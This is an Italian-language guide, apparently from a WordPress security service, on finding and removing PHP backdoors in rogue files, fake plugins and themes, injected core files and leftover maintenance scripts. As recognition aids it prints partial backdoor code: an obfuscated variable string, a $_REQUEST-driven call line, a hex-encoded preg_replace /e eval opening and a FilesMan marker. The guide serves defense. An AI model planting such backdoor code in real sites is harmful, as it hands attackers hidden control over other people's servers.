Cos’è una backdoor?
Una backdoor malevola è un codice che permette un accesso non autorizzato e spesso illimitato a un sito compromesso. Permettono agli aggressori di accedere a tutti i file all’interno dell’account di hosting. Le backdoor possono apparire come normale codice php o offuscato (intenzionalmente oscurato per rendere il codice ambiguo) e nascosto. Una backdoor può essere inserita in un file valido come una sola breve linea di codice che sembra piuttosto innocente. Oppure, una backdoor può essere un file indipendente. L’accesso alla backdoor permette a un attaccante di inserire qualsiasi codice maligno sul sito. Le backdoor si trovano spesso insieme ad altri malware.
Determinare se il tuo sito è infetto
Le backdoor possono essere difficili da trovare perché sono spesso codice offuscato. Di solito se c’è una backdoor, ce ne sono altre che possono avere o meno lo stesso aspetto. A volte le backdoor sono script di manutenzione non protetti lasciati accidentalmente dopo la manutenzione autorizzata del sito.
Il proprietario di un sito spesso non è a conoscenza dell’esistenza di backdoor sul sito, tuttavia, se viene trovato altro malware sul sito, è probabile che esistano anche molti file backdoor o iniezioni di codice, permettendo a un attaccante di entrare nel sito.
Trovare e rimuovere le backdoor
La rimozione delle backdoor richiede un’analisi del codice del sito. Le backdoor si trovano tipicamente all’interno di file php sul server web. Possono essere inseriti nei file del core, dei plugin o del tema, oppure possono essere un file indipendente. Si possono trovare in qualsiasi directory accessibile pubblicamente sul vostro server che può essere facilmente accessibile dalla persona che l’ha inserita.
Per rimuovere la backdoor, prima create un backup dei file del sito e del database. È utile rivedere i file di log degli accessi http grezzi, poiché l’utilizzo della backdoor avviene tipicamente attraverso una richiesta HTTP POST a un file.
Un account amministrativo compromesso può permettere all’attaccante di utilizzare l’editor del tema principale per aggiungere una backdoor al file 404 di un tema. In questo modo, ogni richiesta al vostro sito che genera un messaggio di errore 404 serve una backdoor che può essere utilizzata da chiunque sappia che è lì.
Rimuovere la backdoor richiede di trovare il codice che permette l’accesso non autorizzato e rimuovere quel codice. Richiede una comprensione del codice che gestisce il vostro sito.
Rogue File Backdoors
Qui ci sono alcuni esempi di backdoor trovati come file rogue, o file che non fanno parte del plugin principale, del tema o del sistema di gestione dei contenuti. Hanno nomi che sembrano innocenti o simili ad altri file principali come xml.php, media.php, plugin.php, ecc. e possono essere posizionati ovunque nel sito. Il codice di un file canaglia potrebbe iniziare così:
$t43="l/T6\\:aAcNLn#?rP}1\rG_ -s`SZ\$58t\n7E{.*]ixy3h,COKR2dW = ${$t43.$t43
È importante non solo cercare file estranei sul vostro sito, ma esaminare ogni file.
Plugin e temi backdoor
Se un account amministrativo è compromesso, gli aggressori spesso utilizzano le funzionalità di caricamento di plugin o temi di un sito per aggiungere backdoor.
Se un plugin viene aggiunto con backdoor, può apparire o meno nella pagina di amministrazione dei plugin. I file maligni dei plugin sono spesso nascosti alla vista e sono visibili solo nel file system attraverso il vostro file manager o FTP. Spesso hanno nomi che sembrano utili, come:
- WordPress Support
- Login Wall
- WP zipp
- WP-Base-SEO
Plugins possono essere installati che sembrano normali plugins, chiamati qualcosa come Akismet3 insieme ad alcuni vecchi file Akismet validi ma con codice backdoor contenuto nei file caricati.
I file del tema possono anche essere aggiunti contenenti backdoor. Il tema WordPress Sketch è stato per un certo periodo un tema popolare carico di malware caricato con numerosi file backdoor al suo interno. Il tema potrebbe apparire nella pagina di amministrazione del tema, o potrebbe mancare di alcuni file ed essere elencato in fondo a quella pagina come un tema inattivo perché mancano alcuni file.
Se hai temi o plugin che non riconosci, rimuovili. Ma avrete anche bisogno di rivedere il resto dei vostri file. Spesso una backdoor è un mezzo per aggiungere altre backdoor in tutto il sito, compresa la modifica dei file principali per aggiungere funzionalità backdoor al loro interno.
Inserti di backdoor nei file principali
I file principali del vostro Content Management System possono avere backdoor inserite al loro interno. Possono essere aggiunti all’inizio del file, alla fine del file e, in alcuni casi, all’interno del codice valido del file core stesso.
Questo codice, o codice simile, è spesso aggiunto all’inizio di una pagina valida.
if (isset($_REQUEST)){$_FILE =$_REQUEST('$_',$_REQUEST.'($_);');$_FILE(stripslashes($_REQUEST));}
Ecco un altro esempio.
Altre backdoor sono altamente offuscate e possono iniziare così.
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\
Spesso ci saranno riferimenti a FilesMan da qualche parte all’interno del file backdoor.
$default_action = "FilesMan";
A volte una backdoor scrive specificamente contenuti dannosi in un file specifico, in questo caso, reindirizza al file .htaccess.
Script di manutenzione non protetti
Gli script di manutenzione a volte vengono lasciati dopo la manutenzione. Questi script vengono poi scoperti dagli aggressori e sfruttati. Un popolare script di manutenzione è searchreplacedb2.php che permette l’accesso illimitato al database del sito.
Guardare oltre la backdoor
Le backdoor sono spesso usate come un mezzo per un fine insieme ad altre pagine dannose. Se avete delle backdoor, molto probabilmente avete altri malware sul vostro sito come pagine di spam, link di spam, operazioni di phishing o reindirizzamenti malevoli.
Non importa quale tipo di backdoor avete trovato sul vostro sito, la grande domanda è: come ci è arrivata? Ci possono essere altri tipi di malware o vulnerabilità di sicurezza sul vostro sito che hanno permesso a un attaccante di ottenere l’accesso al sito. Gli aggressori spesso piazzano più backdoor, alcune simili, altre diverse, quindi una revisione dell’intero sito è importante.
Se dopo aver letto questa guida, non siete sicuri di come rimuovere le backdoor, se non siete sicuri di averle rimosse tutte, o state cercando altre risposte su come il codice è stato messo sul vostro sito, chiedete aiuto.